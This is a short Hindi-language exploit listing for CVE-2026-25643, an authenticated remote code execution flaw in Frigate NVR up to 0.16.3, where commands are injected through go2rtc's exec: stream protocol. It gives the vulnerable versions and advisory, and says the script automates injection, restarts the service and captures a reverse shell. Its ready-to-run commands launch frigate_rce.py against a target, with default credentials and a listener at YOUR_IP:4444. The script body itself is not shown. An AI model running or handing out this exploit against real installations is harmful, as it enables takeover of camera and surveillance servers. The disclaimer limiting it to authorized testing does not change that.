
Frigate NVR प्रमाणित RCE के लिए शोषण go2rtc exec: प्रोटोकॉल इंजेक्शन, सिस्टम कमांड निष्पादन और रिवर्स शेल कैप्चर को स्वचालित करना।
शोषण शीर्षक: Frigate NVR <= 0.16.3 - प्रमाणित दूरस्थ कोड निष्पादन
दिनांक: 2026-02-05
शोषण लेखक: jduardo2704
विक्रेता होमपेज: https://frigate.video/
सॉफ्टवेयर लिंक: https://github.com/blakeblackshear/frigate
संस्करण: <= 0.16.3
CVE: CVE-2026-25643
परामर्श: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
Frigate संस्करण 0.16.3 तक go2rtc कॉन्फ़िगरेशन के माध्यम से दूरस्थ कोड निष्पादन (RCE) के लिए असुरक्षित हैं। प्रमाणित पहुंच वाला हमलावर (या यदि इंस्टेंस खुला है तो अप्रमाणित) exec: प्रोटोकॉल का उपयोग करके स्ट्रीम कॉन्फ़िगरेशन में सिस्टम कमांड इंजेक्ट कर सकता है। यह शोषण पेलोड इंजेक्शन को स्वचालित करता है, सेवा को पुनरारंभ करता है, और रिवर्स शेल को पकड़ता है।
pip install requests pyyaml
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।